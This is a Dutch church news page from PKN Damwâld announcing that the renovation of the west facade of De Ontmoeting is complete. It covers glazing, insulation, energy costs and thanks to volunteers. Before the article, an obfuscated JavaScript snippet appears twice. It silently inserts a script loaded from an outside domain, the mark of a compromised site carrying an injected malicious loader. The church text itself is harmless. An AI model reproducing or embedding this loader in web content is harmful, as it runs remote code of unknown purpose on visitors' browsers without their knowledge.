;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Renovatie westgevel De Ontmoeting is afgerond! - PKN Damwâld

Renovatie westgevel De Ontmoeting is afgerond!

Gepubliceerd op: woensdag 12 oktober 2022

De afgelopen 8 weken is er hard gewerkt aan de verbouwing van de Westgevel. De laatste 20 jaar kwamen steeds meer mankementen aan het licht. Helaas was het niet mogelijk om alleen de ramen en kozijnen te vervangen maar was het ook nodig om het gehele frame van de ramen opnieuw op te bouwen. Deze constructie was in een dusdanig slechte staat dat er niks anders op zat dan grootschalig en rigoureus te werk te gaan. Echter was dit wel een mooie kans om een duurzame oplossing toe te passen in de vorm van drie dubbel glas in aluminium kozijnen en geïsoleerde onderhoudsvrije panelen aan de buitenzijde. Er is voor een beglazing gekozen die de lichtinval minimaliseert en de invloed van de zon zo minimaal mogelijk maakt. Hierdoor is het niet meer nodig om de zonwering terug te plaatsen omdat er weinig invloed meer is op de beamer en het orgelspel. Tevens is hiermee het oorspronkelijke transparante ontwerp van de kerk weer in ere hersteld.
Tegelijkertijd zijn ook de muren van de complete kerkzaal geïsoleerd met zogenoemde HR++ thermoparels (hoogwaardige verlijmde piepschuim bolletjes) en hierna wordt het voegwerk van de complete kerk ook nog opgeknapt. En dat is broodnodig want vanaf 1 januari 2023 gaan de gaskosten naar verwachting sterk stijgen. Energie voor Kerken (een inkoopcollectief voor kerken met 6.400 aansluitingen) geeft aan dat de energiekosten volgend jaar 4x zo hoog zullen zijn. Gelukkig kunnen we dankzij onze zonnepanelen al vele jaren goedKOOP aan onze stroom komen!
Onder leiding van kerkrentmeester Henk-Jan van der Valk is er een plan opgesteld voor verbouw. Dijkstra Draisma heeft deze klus vervolgens geklaard in samenwerking met gemeenteleden die zich bezig hebben gehouden met het verbouw klaar maken en het aanbrengen van beschermende voorzieningen voor onder andere het orgel. Op dit moment (30-09-2022) zijn vrijwilligers drukdoende om de kerk weer op orde te brengen en schoon te maken samen met de koster. We zitten goed op schema en de eerste dienst in onze kerk zal plaatsvinden op zondag 16 oktober.
De werkzaamheden rondom de kerk zullen nog enige tijd in beslag nemen, maar hierna staat deze er vooreerst weer keurig voor. Bedankt vrijwilligers en koster voor jullie inzet voor de verbouwing. We mogen dankbaar zijn dat we deze expertise en inzet hebben in onze Kerk!